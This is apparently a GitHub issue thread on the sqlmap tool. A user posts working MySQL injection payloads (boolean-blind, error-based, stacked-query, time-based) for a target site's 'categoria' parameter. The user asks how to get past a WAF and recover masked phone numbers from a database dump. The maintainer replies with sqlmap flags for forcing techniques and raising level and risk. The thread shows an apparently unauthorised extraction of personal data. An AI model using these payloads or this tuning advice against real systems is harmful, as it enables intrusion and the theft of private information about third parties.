### ISSUE TITLE
output data ENCODING WAF bypass

### ISSUE THREAD

**Issue by pedroksz** [sqlmapproject/sqlmap#3245]
Parameter: categoria (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoria=Bebidas' AND 4891=4891 AND 'scrY'='scrY

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: categoria=Bebidas' AND (SELECT 5667 FROM(SELECT COUNT(*),CONCAT(0x71626a6271,(SELECT (ELT(5667=5667,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NDWT'='NDWT

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: categoria=Bebidas';SELECT SLEEP(5)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: categoria=Bebidas' AND SLEEP(5) AND 'IgSE'='IgSE

my output data of target show 93938*****904904 not show the full number...How do I solve this?
The target protected by WAF, but i do not know the tamper I use to resolve this.

**Comment by stamparm** [comment]
What's the context here? What is `93938*****904904`? Nothing is clear from this report

**Comment by pedroksz** [comment]
Example : I use --dump to dump column name phone number....problem is phone number nothing output complete, output part of this - > example 11 99****4012 .... 
how can I get the complete data without the * , its possible?

**Comment by stamparm** [comment]
This doesn't look like its caused by sqlmap. Also, it doesn't look like something that WAF/IPS could cause. I believe that this is your job to inspect what is going on.

Either A) this is a valid data (while you think it is not) or B) application is trimming DBMS error message (used by error-based SQLi)

You should either A) try to force the usage of `--technique=T` and see what is going on (to see whether you'll get same results <- though, this will run much slower) or B) try to get the boolean based SQLi working (e.g. by usage of `--level=5 --risk=3 --flush-session` OR with `--string=...`)
